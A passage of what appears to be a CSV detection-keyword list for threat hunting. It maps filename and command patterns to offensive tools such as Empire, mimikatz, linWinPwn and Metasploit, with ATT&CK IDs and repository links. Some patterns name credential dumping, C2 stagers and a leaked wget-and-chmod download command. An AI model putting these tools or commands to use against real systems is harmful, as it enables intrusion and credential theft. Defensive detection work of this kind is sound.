-*--user_file*--password_file*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*user_password.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*user_to_secretsdump.py*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*user|username|login|pass|password|pw|credentials*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*UserEnum*,offensive_tool_keyword,UserEnum,The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.,T1210.001 - T1213 - T1071.001,TA0007 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/sensepost/UserEnum,1,1,N/A,N/A,3,209,45,2018-06-03T19:08:37Z,2018-05-21T16:55:58Z -*UserHunterImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*username-anarchy *,offensive_tool_keyword,username-anarchy,Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.,T1110 - T1134 - T1078,TA0006,N/A,N/A,Credential Access,https://github.com/urbanadventurer/username-anarchy,1,0,N/A,N/A,6,564,113,2022-01-26T18:34:02Z,2012-11-07T05:35:10Z -*UsernameAsPasswordCreds.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*userpass_cme_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*userpass_kerbrute_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*UserPassBruteForce*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*users/public/troubleshooting_log.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*users\\public\\elevationstation.js*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*users\\usethis\\NewFile.txt*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*users\public\example.bin*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,0,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*users\public\temp.bin*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,0,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*users_asreproast.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_dcsrp_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_kerberoasting.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_list_cme_ldap_nullsess_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*users_list_kerbrute_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*users_list_ridbrute_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*users_no_req_pass.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_no_req_pass_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*usestager *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *backdoor*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *ducky*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *launcher_bat*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *launcher_lnk*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager multi/launcher*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*using donutCS*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*using NixImports*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*using SharpExfiltrate*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*using SharpView.Enums*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*using SMBeagle*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*Using VirusToal website as external C2*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*UsoDllLoader*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,1,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z -*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*usr/share/seclists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*usr/src/rusthound rusthound *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*util.nimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*util/dot_net_deserialization/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*utils/payloads.db*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Utils\Posh.cs*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*uTorrent (1).exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*uTorrent.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*utorrent_installer.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*utweb_installer.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*V3n0M-Scanner*,offensive_tool_keyword,V3n0M-Scanner,V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.,T1210.001 - T1190 - T1191 - T1595,TA0007 - TA0002 - TA0008 - TA0010,N/A,N/A,Web Attacks,https://github.com/v3n0m-Scanner/V3n0M-Scanner,1,1,N/A,N/A,10,1341,432,2023-10-03T06:04:39Z,2013-10-21T06:05:17Z -*v4d1/Dome*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*valid_user@contoso.com:Password1*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*vanhauser-thc/thc-hydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*vault::*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vault::cred*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - 